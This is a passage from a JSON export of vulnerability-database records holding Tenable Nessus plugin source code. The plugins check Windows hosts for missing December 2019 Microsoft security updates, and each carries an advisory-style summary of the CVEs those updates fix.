copyright (C) Microsoft Corporation.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131931);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/27\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1472\",\n \"CVE-2019-1474\",\n \"CVE-2019-1476\",\n \"CVE-2019-1483\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530714\");\n script_xref(name:\"MSFT\", value:\"MS19-4530714\");\n\n script_name(english:\"KB4530714: Windows 10 Version 1709 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530714.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles\n junctions. (CVE-2019-1483)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists when\n Windows AppX Deployment Service (AppXSVC) improperly\n handles hard links. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1476)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\");\n # https://support.microsoft.com/en-us/help/4530714/windows-10-update-kb4530714\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?17cbf480\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4530714.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530714');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nmy_os_build = get_kb_item(\"SMB/WindowsVersionBuild\");\nproductname = get_kb_item_or_exit(\"SMB/ProductName\");\n\nif (my_os_build = \"16299\" && \"enterprise\" >!< tolower(productname) && \"education\" >!< tolower(productname) && \"server\" >!< tolower(productname))\n audit(AUDIT_OS_NOT, \"a supported version of Windows\");\n\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530714])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:33:27", "description": "The remote Windows host is missing security update 4530692 or cumulative update 4530734. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles COM object creation. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530692: Windows 7 and Windows Server 2008 R2 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1453", "CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1478", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2023-01-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530734.NASL", "href": "https://www.tenable.com/plugins/nessus/131934", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131934);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1478\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0450\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"MSKB\", value:\"4530692\");\n script_xref(name:\"MSKB\", value:\"4530734\");\n script_xref(name:\"MSFT\", value:\"MS19-4530692\");\n script_xref(name:\"MSFT\", value:\"MS19-4530734\");\n\n script_name(english:\"KB4530692: Windows 7 and Windows Server 2008 R2 December 2019 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530692\nor cumulative update 4530734. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530734/windows-7-update-kb4530734\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89866a56\");\n # https://support.microsoft.com/en-us/help/4530692/windows-7-update-kb4530692\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?abe20468\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530692 or Cumulative Update KB4530734.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Uninitialized Variable Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530734', '4530692');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530734, 4530692])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:33:24", "description": "The remote Windows host is missing security update 4530719 or cumulative update 4530695. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles COM object creation. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)", "cvss3": {}, "published": "2019-12-10T00:00:00", "type": "nessus", "title": "KB4530719: Windows Server 2008 December 2019 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1458", "CVE-2019-1465", "CVE-2019-1466", "CVE-2019-1467", "CVE-2019-1468", "CVE-2019-1469", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1478", "CVE-2019-1484", "CVE-2019-1485", "CVE-2019-1488"], "modified": "2023-01-19T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530695.NASL", "href": "https://www.tenable.com/plugins/nessus/131929", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131929);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1478\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"MSKB\", value:\"4530695\");\n script_xref(name:\"MSKB\", value:\"4530719\");\n script_xref(name:\"MSFT\", value:\"MS19-4530695\");\n script_xref(name:\"MSFT\", value:\"MS19-4530719\");\n\n script_name(english:\"KB4530719: Windows Server 2008 December 2019 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530719\nor cumulative update 4530695. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530719/windows-server-2008-update-kb4530719\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0050734\");\n # https://support.microsoft.com/en-us/help/4530695/windows-server-2008-update-kb4530695\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4b9efd1a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530719 or Cumulative Update KB4530695.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Uninitialized Variable Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530695', '4530719');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530695, 4530719])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:33:28", "description": "The remote Windows host is missing security update 4530684.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1471)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2019-1472, CVE-2019-1474)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions. (CVE-2019-1483)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2019-1476)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2019-1470)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2019-1485)\n\n - A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n (CVE-2019-1488)", 